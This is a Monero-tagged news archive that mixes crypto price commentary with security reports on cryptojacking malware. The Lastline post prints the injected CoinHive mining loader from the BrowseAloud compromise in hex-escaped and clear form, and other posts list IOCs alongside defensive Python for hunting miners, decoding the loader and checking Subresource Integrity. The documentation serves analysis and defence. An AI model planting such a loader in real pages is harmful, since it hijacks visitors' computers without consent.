Category Archives: Monero

Monero Price Analysis: Wider Adoption Seen as Bity Adds XMR Support to Their ATM Network

Swiss-based cryptocurrency organization Bity has added support for XMR at its ATM terminals. XMR/USD is trading up on Friday, with gains of over 3% at the time of writing. Despite this, the weekly chart still points to the downside. XMR/USD is trading in positive territory on Friday, having gained over 3% during the session. […]

The post Monero Price Analysis: Wider Adoption Seen as Bity Adds XMR Support to Their ATM Network appeared first on Hacked: Hacking Finance.

Crypto Update: New Lows in Sight Again as Slide Continues

The cryptocurrency segment continues to be under heavy selling pressure following the weekend rally attempt, and although all of the majors are still above last week’s lows, the strong short-term downtrend remains dominant. The long-term picture is overwhelmingly bearish as well, and there are coins showing meaningful relative strength, so sellers are clearly still […]

The post Crypto Update: New Lows in Sight Again as Slide Continues appeared first on Hacked: Hacking Finance.

Crypto Update: Weekend Bounce Fails to Turn Bearish Tide

The major cryptocurrencies continue to be stuck in declining trends, despite the bounce that followed the latest technical breakdown in the segment. The top coins failed to recover sustainably above the prior bear market lows, and today the market turned lower again, with the weakest currencies already threatening new lows. The long-term picture remains […]

The post Crypto Update: Weekend Bounce Fails to Turn Bearish Tide appeared first on Hacked: Hacking Finance.

Crypto Update: Sell-Off Deepens as Majors Break Key Levels

The past 24 hours saw another crucial bearish move in the cryptocurrency segment, with the majority of the top coins violating their prior bear market lows and starting another leg lower in the damaging downtrend. Even the relatively stronger coins turned bearish in our trend model with regards to the short-term time-frame while staying bearish […]

The post Crypto Update: Sell-Off Deepens as Majors Break Key Levels appeared first on Hacked: Hacking Finance.

415,000 routers infected by cryptomining malware – Prime target MikroTik

By Waqas

According to a new report, around 415,000 routers throughout the world are infected with malware that has the potential to steal computer resources and discreetly mine cryptocurrency. The campaign is an active one and it primarily targets MikroTik routers. Researchers claim that the cryptojacking attacks started in August and in the first string of […]

This is a post from HackRead.com. Read the original post: 415,000 routers infected by cryptomining malware – Prime target MikroTik

Crypto Update: Altcoins Remain Under Pressure as Bitcoin Holds Support

The cryptocurrency segment continues to trade with a bearish bias, with almost all majors challenging their bear market lows in the past 24 hours. While a broad breakdown has been avoided so far, in the case of the top coins, there is still no sign of meaningful bullish momentum or a developing leadership, so odds […]

The post Crypto Update: Altcoins Remain Under Pressure as Bitcoin Holds Support appeared first on Hacked: Hacking Finance.

KingMiner Maxes Out Windows Server CPUs in Widespread Cryptomining Campaign

Researchers spotted a new cryptomining threat that brute-forces its way into Microsoft Windows servers running Internet Information Services (IIS) and Structured Query Language (SQL) Server, then consumes 100 percent of their compute resources.

The malware, called KingMiner, is designed not to steal information but to harvest cryptocurrencies such as Monero, which require considerable processing power to crunch through the mathematical calculations behind them, according to researchers at Check Point.

KingMiner was first discovered this past June, but it has since spawned a new variant with even stronger cryptomining features that is now active in the wild.

Cryptomining Campaign Drains CPUs

Once it identifies its target, KingMiner attempts to guess the system’s password, then downloads and executes a Windows scriptlet file. In some cases, the malware is already active on the system, in which case the new version kills off its predecessor. Israel, Norway, Mexico and India are among the locations where the cryptomining campaign has successfully infected Windows machines, according to the researchers.

KingMiner uses a file called XMRig to mine Monero. Although it was designed to use up only 75 percent of a victim’s machine, in practice, it drains the entire capacity of the central processing unit (CPU) due to coding errors.

The cybercriminals behind KingMiner also take pains to avoid detection. Because the miner avoids public mining pools for its cryptocurrency wallet and turns off its application programming interface (API), for instance, it is difficult to know how much Monero it has harvested so far. Emulation attempts, meanwhile, are bypassed through an XML file that has been disguised as a ZIP file within the payload. Additional evasion techniques include exporting functions and adding content to the executable’s dynamic link library (DLL) files.

How to Keep Cryptomining Malware at Bay

The researchers noted that KingMiner is likely to continue its evolution based on placeholders they found in the code for future updates and versions.

Cybercriminals are increasingly interested in mining cryptocurrency because it requires less social engineering and the malware can run quietly in the background. Eliminating threats such as KingMiner depends on widespread adoption of security information and event management (SIEM) technology and improved network endpoint protection.

Source: Check Point

The post KingMiner Maxes Out Windows Server CPUs in Widespread Cryptomining Campaign appeared first on Security Intelligence.

Crypto Update: Weakening Bearish Momentum Leads to Another Rally Attempt

The cryptocurrency segment is having its most bullish day in a long while, as despite the failed rally attempt on Monday, the top coins held up above their lows and launched another bounce. While that didn’t change the overwhelmingly bearish overall picture, it confirmed the weakening of the negative momentum, at least in the case […]

The post Crypto Update: Weakening Bearish Momentum Leads to Another Rally Attempt appeared first on Hacked: Hacking Finance.

Trade Recommendation: Monero

Monero (XMR/BTC) came off lows of 0.0131 on August 18, 2018. At that point, the market showed signs of bear exhaustion. It was oversold on the daily RSI. In addition, bears failed to flip 0.014 support into resistance as bulls fought back to reject lower prices. With these conditions, it appeared that the short-term bottom […]

The post Trade Recommendation: Monero appeared first on Hacked: Hacking Finance.

Crypto Update: Coins Bounce Back but Bear Trap Not Yet Confirmed

The cryptocurrency segment is finally showing early signs of strength following the weekend’s selloff that took most of the majors to new bear market lows. Compared to the steep declines of the past couple of weeks, the bearish momentum has been relatively weak, and some of the top coins managed to climb back to, or […]

The post Crypto Update: Coins Bounce Back but Bear Trap Not Yet Confirmed appeared first on Hacked: Hacking Finance.

Experts found a new powerful modular Linux cryptominer

Security experts from Russian antivirus firm Dr.Web have discovered a new strain of Linux cryptominer tracked as Linux.BtcMine.174.

The Linux cryptominer has a multicomponent structure that implements a broad range of features in over 1,000 lines of code.

When the Monero Linux cryptominer is first executed, it checks whether the server from which the Trojan will later download additional modules is available.

Then it finds a folder on disk to which it has write permissions, copies itself there, and uses that folder as a staging area for the additional modules it downloads.

The Linux.BtcMine.174 Linux cryptominer uses one of two privilege escalation exploits, CVE-2016-5195 (aka Dirty COW) or CVE-2013-2094, to get root permissions on the infected system.

The Linux miner also adds itself as an autorun entry to files such as /etc/rc.local, /etc/rc.d/…, and /etc/cron.hourly, and then downloads and runs a rootkit.

“If the script is not run with /sbin/init, the following actions are performed:

  1. The script is moved to a previously selected folder with write permissions (rwx) that is named diskmanagerd (the name is specified in the $WatchDogName variable).
  2. The script tries to restart using nohup or just in the background if nohup is not installed (in this case, the Trojan installs the coreutils package).”, reads the analysis published by Dr.Web.

Once the malware has infected the Linux system, it scans for and terminates the processes of several other miners: it inspects /proc/${pid}/exe and /proc/${pid}/cmdline for specific strings (cryptonight, stratum+tcp, etc.). Experts also discovered that the Trojan kills antivirus software, including Avast, AVG, Dr.Web and ESET.

Then Linux.BtcMine.174 downloads and starts its own Monero-mining operation.

Linux.BtcMine.174 also downloads and executes a rootkit with the ability to steal user-entered passwords for the su command and to hide files in the file system, network connections, and running processes.

The Trojan also collects data on all the hosts to which the current user has previously connected via SSH and tries to connect to them.

Experts believe the malware is spreading using SSH credentials stolen on the infected systems.

Additional technical details are included in the report published by Dr.Web; the experts also published SHA1 hashes for the various components of the malware on GitHub.
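The write-up names the strings the Trojan itself looks for in /proc/${pid}/exe and /proc/${pid}/cmdline (cryptonight, stratum+tcp), the autorun files it touches, and the diskmanagerd watchdog name; a responder can turn the same indicators around into a hunt. The following Python is an added example, not Dr.Web's code or anything from the report: the marker list adds "xmrig" (the miner named elsewhere on this page) as an assumption, the world-writable-directory heuristic is mine, and the process table and autorun files at the bottom are constructed sample data, not real IoCs.

```python
import os
import re
from typing import Dict, Iterable, List, Tuple

# Strings the Dr.Web write-up says the Trojan searches for in /proc/<pid>/exe and
# /proc/<pid>/cmdline to find rival miners; "xmrig" is added here as an assumption.
MINER_MARKERS = ("cryptonight", "stratum+tcp", "xmrig")

# Watchdog name quoted in the write-up ($WatchDogName = diskmanagerd).
SUSPICIOUS_NAMES = ("diskmanagerd",)

# Autorun locations the write-up names as persistence points (for a live scan).
AUTORUN_PATHS = ("/etc/rc.local", "/etc/rc.d", "/etc/cron.hourly")

# Assumption (mine): an autorun entry that launches something from a world-writable
# directory deserves a look, since the Trojan copies itself into "a folder to which
# it has write permissions".
WORLD_WRITABLE = re.compile(r"(^|\s)(/tmp|/var/tmp|/dev/shm)/")

Proc = Tuple[int, str, str]  # (pid, exe path, command line)


def find_miner_processes(procs: Iterable[Proc]) -> List[Tuple[int, str]]:
    """Return (pid, marker) for each process whose exe or cmdline carries a miner marker."""
    hits = []
    for pid, exe, cmdline in procs:
        haystack = f"{exe} {cmdline}".lower()
        for marker in MINER_MARKERS:
            if marker in haystack:
                hits.append((pid, marker))
                break
    return hits


def find_suspicious_autoruns(entries: Dict[str, str]) -> List[Tuple[str, str]]:
    """entries maps an autorun file path to its contents; returns (path, line) for
    non-comment lines that launch from a world-writable directory or name the watchdog."""
    hits = []
    for path, content in entries.items():
        for line in content.splitlines():
            line = line.strip()
            if not line or line.startswith("#"):
                continue
            if WORLD_WRITABLE.search(line) or any(n in line for n in SUSPICIOUS_NAMES):
                hits.append((path, line))
    return hits


def collect_procs() -> List[Proc]:
    """Read the live process table on a Linux host (best effort; needs /proc)."""
    procs = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            exe = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            exe = ""
        try:
            with open(f"/proc/{pid}/cmdline", "rb") as fh:
                cmdline = fh.read().replace(b"\0", b" ").decode(errors="replace")
        except OSError:
            cmdline = ""
        procs.append((int(pid), exe, cmdline))
    return procs


# Constructed sample data so the hunt runs offline; none of these are real IoCs.
SAMPLE_PROCS = [
    (101, "/usr/sbin/sshd", "sshd: /usr/sbin/sshd -D"),
    (202, "/tmp/diskmanagerd", "/tmp/diskmanagerd -o stratum+tcp://pool.example.invalid:3333"),
    (303, "/usr/bin/python3", "python3 app.py"),
]
SAMPLE_AUTORUNS = {
    "/etc/rc.local": "#!/bin/sh\nnohup /tmp/diskmanagerd >/dev/null 2>&1 &\nexit 0\n",
    "/etc/cron.hourly/logrotate": "#!/bin/sh\n/usr/sbin/logrotate /etc/logrotate.conf\n",
}

if __name__ == "__main__":
    print("miner-like processes:", find_miner_processes(SAMPLE_PROCS))
    print("suspicious autoruns:", find_suspicious_autoruns(SAMPLE_AUTORUNS))
```

On a live host, replace SAMPLE_PROCS with collect_procs() and read the files under AUTORUN_PATHS into the entries dict; the rootkit described above hides processes, so a clean process listing is not proof of absence.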

Pierluigi Paganini

(Security Affairs – Linux cryptominer, Linux.BtcMine.174)

The post Experts found a new powerful modular Linux cryptominer appeared first on Security Affairs.

Crypto Update: Another Steep Selloff Drags Majors to New Lows

The cryptocurrency segment got hit hard yet again this weekend, as the mid-week bounce faded and the recent panic lows failed to hold up the top coins. The negative long-term market forces took hold of the segment again, and despite the deeply oversold momentum readings, the majors plunged to new lows. Bitcoin briefly violated the […]

The post Crypto Update: Another Steep Selloff Drags Majors to New Lows appeared first on Hacked: Hacking Finance.

L0rdix malware on dark web steals data, mines crypto & enslaves PCs as botnet

By Waqas

There’s a new hacking tool circulating in the underground Dark Web forums that lets cybercriminals target Microsoft Windows computers. It has become the newest universal go-to tool to attack a Windows machine because it presents an utterly lethal combination of data stealing, cryptomining, and snooping capabilities. Discovered by Ben Hunter, a security researcher at enSilo, […]

This is a post from HackRead.com. Read the original post: L0rdix malware on dark web steals data, mines crypto & enslaves PCs as botnet

Crypto Update: Majors Test Lows After Consolidation

After a brief quiet period in the cryptocurrency segment, the top coins turned lower again in the second half of the day and approached their recent bear market lows. While Bitcoin only tested its panic low, Ethereum dipped below at and the still relatively strong Ripple also fell below the key long-term support zone that […]

The post Crypto Update: Majors Test Lows After Consolidation appeared first on Hacked: Hacking Finance.

Crypto Update: New Bear Market Lows Across the Board

The key long-term breakdown in the cryptocurrency segment that we observed last week continued in earnest today, with most of the majors hitting new bear market lows amid another wave of heavy selling. Bitcoin dropped below $5200 for the first time since last October, Ethereum violated the key $160 level, Litecoin plunged below $38, with […]

The post Crypto Update: New Bear Market Lows Across the Board appeared first on Hacked: Hacking Finance.

Long-Term Cryptocurrency Analysis: Bear Market Continues With Major Technical Breakdown

After months of choppy consolidation, yesterday, we saw the largest move in the cryptocurrency segment since April, which took the majors below key technical levels. Bitcoin’s drop is the most important event, since the most valuable coin violated a structurally important base support for the first time since its historic bull run to $20,000 started. […]

The post Long-Term Cryptocurrency Analysis: Bear Market Continues With Major Technical Breakdown appeared first on Hacked: Hacking Finance.

Headmaster caught mining cryptocurrency at school; gets fired

By Uzair Amir

A Chinese school headmaster, Lei Hua, was caught mining cryptocurrency using the school’s electricity. As a result, he lost his job. It happened at Puman Middle School in Hunan province, China. Initially, teachers complained about the loud noise that continued day and night, while an increase in the school’s electricity consumption was also reported […]

This is a post from HackRead.com. Read the original post: Headmaster caught mining cryptocurrency at school; gets fired

Fake Flash updates upgrade software, but install crypto-mining malware

Cybersecurity firm Palo Alto Networks reports that it discovered a fake Flash updater that has been duping conscientious computer users since August. The fake updater installs files that sneak in a cryptocurrency mining bot called XMRig, which mines Monero.

But here's the catch: while the fake updater is installing the XMRig malware, it is also genuinely updating the user's Flash.

Via: The Next Web

Source: Palo Alto Networks

Evasive Monero Miners: Deserting the Sandbox for Profit

Authored by: Alexander Sevtsov
Edited by: Stefano Ortolani

Introduction

It’s not news that the cryptocurrency industry is on the rise. Mining crypto coins offers anybody a lucrative way to exchange computation resources for profit: every time a miner guesses the solution to a complex mathematical puzzle, they are rewarded with a newly minted crypto coin. While some cryptocurrencies are based on puzzles that are efficiently solved by special-purpose devices (such as Bitcoin on ASICs), others are still mined successfully on commodity hardware.

One in particular is the Monero (XMR) cryptocurrency. Besides being efficiently mined on standard CPUs and GPUs, it is also anonymous, or fungible, to use the precise Monero term. This means that while it is easy to trace transactions between several Bitcoin wallets, a complex system relying on ring signatures ensures that Monero transactions are difficult if not impossible to trace, effectively hiding the origin of a transaction. Because of this, it should come as no surprise that the Monero cryptocurrency is also used for nefarious purposes, often mined by rogue JavaScript or binaries downloaded onto and running on an unsuspecting user’s system.

Recent statistics show that 5% of all Monero coins are mined by malware. While the security industry is responding to this cryptojacking phenomenon by introducing new improved detection techniques, developers of these binaries began to replicate the modus operandi of ransomware samples: they started embedding anti-analysis techniques to evade detection as long as possible. In this blog article, we highlight some of our findings when analyzing a variant of the XMRig miner, and share insights about some evasion tricks used to bypass dynamic analysis systems.

Dropper

The sample (sha1: d86c1606094bc9362410a1076e29ac68ae98f972) is an obfuscated .Net application that uses a simple crypter to load an embedded executable at runtime using the Assembly.Load method. The following XOR key is used for its decryption:

50 F5 96 DF F0 61 77 42 39 43 FE 30 81 95 6F AF

Execution is later transferred via the EntryPoint.Invoke method to its entry point, after which another binary resource is decrypted. Figure 1 shows the encryption (AES-256) and the key derivation (PBKDF2) algorithms used to decrypt the binary.

Figure 1. AES decryption routine of the embedded file; note the PBKDF2 key derivation.

The decrypted data consists of yet another executable. We can see it in Figure 2, surrounded by strings that already give away some of the included functionality (in particular, note the CheckSandbox and CheckVM strings, most likely routines used to detect whether the sample is running inside an analysis environment).

Figure 2. Decrypted binary blob with an embedded executable file.

As the reader can imagine, we are always interested in discovering novel evasion techniques. With piqued curiosity, we decided to dive into the code a bit further.

Payload

After peeling off all encryption layers, we finally reached the unpacked payload (see Figure 3). As expected, we found quite a number of anti-analysis techniques.

Figure 3. The unpacked payload (sha1: 43f84e789710b06b2ab49b47577caf9d22fd45f8) as found in VT.

The most classic trick (shown in Figure 4) merely checks for known analysis processes. For example, Process Explorer, Process Monitor, etc., are all tools used to better understand which processes are running, how they are spawned, and how much CPU time is consumed by each executing thread. Hiding from such monitoring tools is a pretty standard technique, and it has been used by other crypto miners as well. As we will see, the other checks were a bit more exotic.

Figure 4. Detecting known process monitoring tools via GetWindowTextW.

Evasion Technique – Lack of User Input

This technique specifically targets dynamic analysis systems. It tries to detect whether it is executing on a real host by measuring the amount of input received by the operating system. Admittedly, this is not that rare, and we covered it in a previous article describing some of the evasion techniques used by ransomware.

Figure 5. Detecting sandbox by checking the last user input via GetLastInputInfo.

Figure 5 shows the logic in more detail: the code measures the time interval between two subsequent inputs. Anything longer than one minute is considered an indicator that the binary is running inside a sandbox. Note that, besides being prone to false positives, this technique can easily be circumvented by simulating random user interactions.

Evasion Technique – Multicast IcmpSendEcho

The second anti-analysis technique that we investigated delays execution via the IcmpCreateFile and IcmpSendEcho APIs. As Figure 6 further details, they are used to ping a reserved multicast address (224.0.0.0) with a timeout of 30 seconds. Since no answer is expected (interestingly enough, we know of some devices that erroneously reply to those ICMP packets), the IcmpSendEcho call has the side effect of pausing the executing thread for 30 seconds.

Figure 6. Delaying the execution via IcmpSendEcho API.

It’s worth noting that a similar trick has previously been used by some infected CCleaner samples. In that case, the malicious shellcode went a step further by checking whether the timeout parameter had been patched in an attempt to accelerate execution (and thus counter the anti-analysis technique).

Conclusions

Any dynamic analysis system wishing to cope with advanced evasive malware must be able to unpack layers of encryption and counter basic anti-analysis techniques. In Figure 7 we can see all the behaviors extracted when fully executing the original sample: the final payload is recognized as a variant of the XMRig Monero CPU miner, and its network traffic is correctly picked up and marked as suspicious.

Figure 7. Lastline analysis of the XMRig CPU miner.

Nevertheless, it is quite worrying that anti-analysis techniques are becoming this mainstream, so much so that they have started to turn into a standard feature of potentially unwanted applications (PUA) as well, including crypto-miners. Hopefully, this is just an isolated case, and not the first of a long series of techniques borrowed from the ransomware world.

Appendix – IOCs

Below the reader can find all the hashes related to this analysis, including the mutex identifying this specific strain and the XMR wallet.

Sha1 (sample): d86c1606094bc9362410a1076e29ac68ae98f972
Sha1 (payload): 43f84e789710b06b2ab49b47577caf9d22fd45f8
Mutex: htTwkXKgtSjskOUmArFBjXWwLccQgxGT
Wallet: 49ptuU9Ktvr6rBkdmrsxdwiSR5WpViAkCXSzcAYWNmXcSZRv37GjwMBNzR7sZE3qBDTnwF9LZNKA8Er2JBiGcKjS6sPaYxY

The post Evasive Monero Miners: Deserting the Sandbox for Profit appeared first on Lastline.

Trust Me, I am a Screen Reader, not a CryptoMiner

Until late Sunday afternoon, a number of public sector websites including ICO, NHS, and local councils (for example, Camden in London) had been serving a crypto miner unbeknownst to visitors, turning them into a free computing cloud at the service of unknown hackers. Although initially only UK sites appeared to be affected, subsequent reports included Irish and US websites as well.

BrowseAloud

Figure 1: BrowseAloud accessibility tool.

While initially researchers considered the possibility of a new vulnerability being exploited at large, Scott Helme (https://twitter.com/Scott_Helme/status/962691297239846914) quickly identified the culprit: a foreign JavaScript fragment added to the JavaScript file (https://wwwbrowsealoud[.]com/plus/scripts/ba.js) of BrowseAloud (see Figure 1), an accessibility tool used by all the affected websites:

\x3c\x73\x63\x72\x69\x70\x74\x3e 
\x69\x66 \x28\x6e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x68\x61\x72\x64\x77\x61\x72\x65\x43\x6f\x6e\x63\x75\x72\x72
\x65\x6e\x63\x79 \x3e \x31\x29\x7b \x76\x61\x72 \x63\x70\x75\x43\x6f\x6e\x66\x69\x67 \x3d 
\x7b\x74\x68\x72\x65\x61\x64\x73\x3a 
\x4d\x61\x74\x68\x2e\x72\x6f\x75\x6e\x64\x28\x6e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x68\x61\x72\x64\x77
\x61\x72\x65\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x63\x79\x2f\x33\x29\x2c\x74\x68\x72\x6f\x74\x74\x6c\x65\x3a
\x30\x2e\x36\x7d\x7d \x65\x6c\x73\x65 \x7b \x76\x61\x72 \x63\x70\x75\x43\x6f\x6e\x66\x69\x67 \x3d 
\x7b\x74\x68\x72\x65\x61\x64\x73\x3a \x38\x2c\x74\x68\x72\x6f\x74\x74\x6c\x65\x3a\x30\x2e\x36\x7d\x7d 
\x76\x61\x72 \x6d\x69\x6e\x65\x72 \x3d \x6e\x65\x77 
\x43\x6f\x69\x6e\x48\x69\x76\x65\x2e\x41\x6e\x6f\x6e\x79\x6d\x6f\x75\x73\x28\'\x31\x47\x64\x51\x47\x70\x59
\x31\x70\x69\x76\x72\x47\x6c\x56\x48\x53\x70\x35\x50\x32\x49\x49\x72\x39\x63\x79\x54\x7a\x7a\x58\x71\'\x2c 
\x63\x70\x75\x43\x6f\x6e\x66\x69\x67\x29\x3b\x6d\x69\x6e\x65\x72\x2e\x73\x74\x61\x72\x74\x28\x29\x3b\x3c
\x2f\x73\x63\x72\x69\x70\x74\x3e

Compromising a third-party JavaScript tool is no small feat, and it allowed deployment of the code fragment on thousands of unaware websites (a comprehensive list of websites using BrowseAloud to provide screen reader support and text translation services is available here: https://publicwww.com/websites/browsealoud.com%2Fplus%2Fscripts%2Fba.js/).

To analyze the obfuscated code we loaded one of the affected websites (Camden Council) into our instrumented web browser (Figure 2) and extracted the clear text.

Figure 2: the Camden Council web site as analyzed by the Lastline instrumented web browser.

As it turns out, it is an instance of the well-known and infamous CoinHive, mining the Monero cryptocurrency:

<script> if (navigator.hardwareConcurrency > 1){ var cpuConfig = {threads: 
Math.round(navigator.hardwareConcurrency/3),throttle:0.6}} else { var cpuConfig = 
{threads: 8,throttle:0.6}} var miner = new 
CoinHive.Anonymous('1GdQGpY1pivrGlVHSp5P2IIr9cyTzzXq', 
cpuConfig);miner.start();</script>
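The clear text above was obtained with Lastline's instrumented browser, but the fragment is plain \xNN escaping and can be recovered offline. The Python below is an added example and not Lastline's tooling: it decodes the hex-escaped fragment exactly as quoted in this post (re-joining the one escape the page's line wrap had split), then pulls out the indicators a responder wants, namely the CoinHive site key, the thread settings and the throttle values. The EXPECTED string is the clear-text script from the post, used as a self-check.

```python
import re
from typing import Dict

# The hex-escaped fragment as quoted in the post; the line breaks of the quote
# were layout only, so the pieces are concatenated here without them.
OBFUSCATED = (
    r"\x3c\x73\x63\x72\x69\x70\x74\x3e "
    r"\x69\x66 \x28\x6e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x68\x61\x72\x64\x77\x61\x72\x65\x43\x6f\x6e\x63\x75\x72\x72"
    r"\x65\x6e\x63\x79 \x3e \x31\x29\x7b \x76\x61\x72 \x63\x70\x75\x43\x6f\x6e\x66\x69\x67 \x3d "
    r"\x7b\x74\x68\x72\x65\x61\x64\x73\x3a "
    r"\x4d\x61\x74\x68\x2e\x72\x6f\x75\x6e\x64\x28\x6e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x68\x61\x72\x64\x77"
    r"\x61\x72\x65\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x63\x79\x2f\x33\x29\x2c\x74\x68\x72\x6f\x74\x74\x6c\x65\x3a"
    r"\x30\x2e\x36\x7d\x7d \x65\x6c\x73\x65 \x7b \x76\x61\x72 \x63\x70\x75\x43\x6f\x6e\x66\x69\x67 \x3d "
    r"\x7b\x74\x68\x72\x65\x61\x64\x73\x3a \x38\x2c\x74\x68\x72\x6f\x74\x74\x6c\x65\x3a\x30\x2e\x36\x7d\x7d "
    r"\x76\x61\x72 \x6d\x69\x6e\x65\x72 \x3d \x6e\x65\x77 "
    r"\x43\x6f\x69\x6e\x48\x69\x76\x65\x2e\x41\x6e\x6f\x6e\x79\x6d\x6f\x75\x73\x28\'\x31\x47\x64\x51\x47\x70\x59"
    r"\x31\x70\x69\x76\x72\x47\x6c\x56\x48\x53\x70\x35\x50\x32\x49\x49\x72\x39\x63\x79\x54\x7a\x7a\x58\x71\'\x2c "
    r"\x63\x70\x75\x43\x6f\x6e\x66\x69\x67\x29\x3b\x6d\x69\x6e\x65\x72\x2e\x73\x74\x61\x72\x74\x28\x29\x3b\x3c"
    r"\x2f\x73\x63\x72\x69\x70\x74\x3e"
)

# Clear text of the same fragment as shown in the post, for a self-check.
EXPECTED = (
    "<script> if (navigator.hardwareConcurrency > 1){ var cpuConfig = {threads: "
    "Math.round(navigator.hardwareConcurrency/3),throttle:0.6}} else { var cpuConfig = "
    "{threads: 8,throttle:0.6}} var miner = new "
    "CoinHive.Anonymous('1GdQGpY1pivrGlVHSp5P2IIr9cyTzzXq', "
    "cpuConfig);miner.start();</script>"
)


def decode_hex_escapes(blob: str) -> str:
    """Turn a \\xNN-escaped JavaScript fragment back into readable source.

    Copes with two artefacts of pasting from a write-up: an escape split across a
    line wrap ("\\x" at the end of one line, the two hex digits at the start of the
    next) and the line wraps themselves, which were never part of the script.
    """
    blob = re.sub(r"\\x\n([0-9a-fA-F]{2})", r"\\x\1", blob)
    blob = blob.replace("\n", "")
    blob = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), blob)
    # Escaped quotes such as \' survive the hex layer; unescape them last.
    return re.sub(r"\\(['\"\\])", r"\1", blob)


def extract_miner_config(script: str) -> Dict[str, object]:
    """Pull the indicators from a CoinHive loader: the site key (the attacker's
    identifier), the thread expressions, the throttle values, and whether the
    miner is actually started."""
    key = re.search(r"CoinHive\.Anonymous\(\s*'([^']+)'", script)
    return {
        "site_key": key.group(1) if key else None,
        "threads": re.findall(r"threads:\s*([^,}]+)", script),
        "throttle": [float(t) for t in re.findall(r"throttle:\s*([0-9.]+)", script)],
        "starts_miner": bool(re.search(r"\bminer\.start\(\)", script)),
    }


if __name__ == "__main__":
    decoded = decode_hex_escapes(OBFUSCATED)
    print("matches post clear text:", decoded == EXPECTED)
    print(extract_miner_config(decoded))
```

The site key is the value worth recording: it is what ties separate compromised pages to the same operator, which is how the reuse noted below on Twitter was spotted.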

Unlike Bitcoin wallet addresses, CoinHive site keys do not allow balance checks, making it impossible to answer the question of how much money the attackers managed to make in this heist. On the other hand, quite interestingly, the very same CoinHive key popped up on Twitter approximately one week ago (https://twitter.com/Banbreach/status/960594618499858432); the context is still not clear, and we will update the blog post as we know more.

As of now (16:34) the company behind BrowseAloud, Texthelp, has removed the JavaScript from its servers (as a preventive measure, the browsealoud[.]com domain has also been set to resolve to NXDOMAIN), effectively putting a stop to this emergency by disabling the BrowseAloud tool altogether. But when did it start, and most importantly, how did it happen?

Figure 3: S3 object metadata.

Marco Cova, one of our senior researchers here at Lastline, quickly noticed that the BrowseAloud JavaScript files were hosted on an S3 bucket (see Figure 3 above).

In particular, the last-modified time of the ba.js resource showed 2018-02-11T11:14:24, making Sunday morning UK time the very first moment this specific version of the JavaScript had been served.

Figure 4: S3 object permissions.

Although it’s not possible to know for certain (only our colleagues at Texthelp can perform this investigation), it seems possible that the attackers managed to modify the object referencing the JavaScript file by taking advantage of weak S3 permissions (see Figure 4). Unfortunately, we cannot pinpoint the exact cause, as we do not have at our disposal all the permission records for the referenced S3 bucket.

Considering the number of components involved in an average website, it is concerning that a single compromise managed to affect so many websites. As Scott Helme noted, however, technologies able to thwart this kind of attack already exist: in particular, had those websites implemented CSP (Content Security Policy) to mandate the use of SRI (Subresource Integrity), any attempt to load a compromised JavaScript file would have failed, sparing thousands of users the irony of mining cryptocurrency for unknown hackers while looking to pay their council tax.
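To make the SRI point concrete, here is an added Python example (not code from Lastline, Texthelp or Scott Helme) that computes the integrity value a site operator would pin for a third-party script, emits the matching script tag and the CSP header that refuses scripts without one, and then replays the browser-side check against an unmodified copy and a copy with a mining loader appended. The script contents, the host name and the site key are all constructed placeholders, not the real ba.js.

```python
import base64
import hashlib

# Constructed stand-in for a third-party script such as ba.js; not the real file.
ORIGINAL_JS = b"window.BrowseAloud = window.BrowseAloud || {}; /* accessibility toolbar */\n"

# The same file with a mining loader appended, mimicking the compromise described
# in the post (constructed; the site key is a placeholder).
TAMPERED_JS = ORIGINAL_JS + (
    b"<script>var miner = new CoinHive.Anonymous('SITEKEY_PLACEHOLDER');"
    b"miner.start();</script>\n"
)


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Return an SRI integrity value ("sha384-<base64 digest>") for content.

    Browsers accept sha256, sha384 and sha512; sha384 is the usual choice.
    """
    if algo not in ("sha256", "sha384", "sha512"):
        raise ValueError("SRI permits only sha256, sha384 or sha512")
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, content: bytes) -> str:
    """Build the <script> tag a site operator publishes for a pinned script.

    crossorigin="anonymous" is required for SRI on cross-origin resources, which
    is exactly the situation with a third-party file served from another host.
    """
    return (f'<script src="{src}" integrity="{sri_hash(content)}" '
            f'crossorigin="anonymous"></script>')


def csp_header() -> str:
    """CSP header that makes the browser refuse scripts lacking an integrity attribute.

    require-sri-for was an experimental directive with limited browser support; it
    is shown because it is the "CSP to mandate SRI" mechanism the post alludes to.
    """
    return "Content-Security-Policy: require-sri-for script"


def browser_accepts(integrity: str, fetched: bytes) -> bool:
    """Mimic the browser-side check: recompute the digest of what was actually
    fetched, using the algorithm named in the attribute, and compare."""
    algo = integrity.split("-", 1)[0]
    return sri_hash(fetched, algo) == integrity


if __name__ == "__main__":
    tag = script_tag("https://cdn.example.invalid/plus/scripts/ba.js", ORIGINAL_JS)
    integrity = tag.split('integrity="')[1].split('"')[0]
    print(tag)
    print(csp_header())
    print("unmodified file loads:", browser_accepts(integrity, ORIGINAL_JS))
    print("tampered file loads:  ", browser_accepts(integrity, TAMPERED_JS))
```

The trade-off is operational rather than technical: once the hash is pinned, every legitimate update of the third-party file needs a coordinated change to the tag, which is precisely why the pinned copy cannot be silently swapped for a miner.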

The post Trust Me, I am a Screen Reader, not a CryptoMiner appeared first on Lastline.